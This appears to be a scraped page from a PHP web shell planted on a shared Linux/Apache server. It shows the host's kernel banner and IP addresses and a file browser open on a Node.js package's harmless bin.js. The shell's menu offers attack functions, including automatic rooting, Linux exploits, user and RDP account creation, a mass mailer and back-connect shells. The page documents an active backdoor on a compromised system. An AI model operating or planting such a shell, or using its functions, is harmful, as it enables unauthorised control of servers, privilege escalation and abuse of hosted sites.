Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@webassemblyjs /
repl /
esm /
[ HOME SHELL ]
Name
Size
Permission
Action
bin.js
895
B
-rwxr-xr-x
index.js
13.44
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bin.js
#!/usr/bin/env node var readline = require("readline"); var _require = require("fs"), createReadStream = _require.createReadStream; var _require2 = require("./index"), createRepl = _require2.createRepl; var filename = process.argv[2]; var isVerbose = process.argv.find(function (x) { return x === "--debug"; }) !== undefined; function onAssert() { process.exit(1); } function onLog(txt) { console.log(txt); } function onOk() {} var repl = createRepl({ isVerbose: isVerbose, onAssert: onAssert, onOk: onOk, onLog: onLog }); if (filename === undefined) { var rl = readline.createInterface({ input: process.stdin }); process.stdout.write("wasm 1.0 JavaScript interpreter\n"); process.stdout.write("> "); rl.on("line", repl.read); } else { var _rl = readline.createInterface({ input: createReadStream(filename) }); _rl.on("line", repl.read); }
Close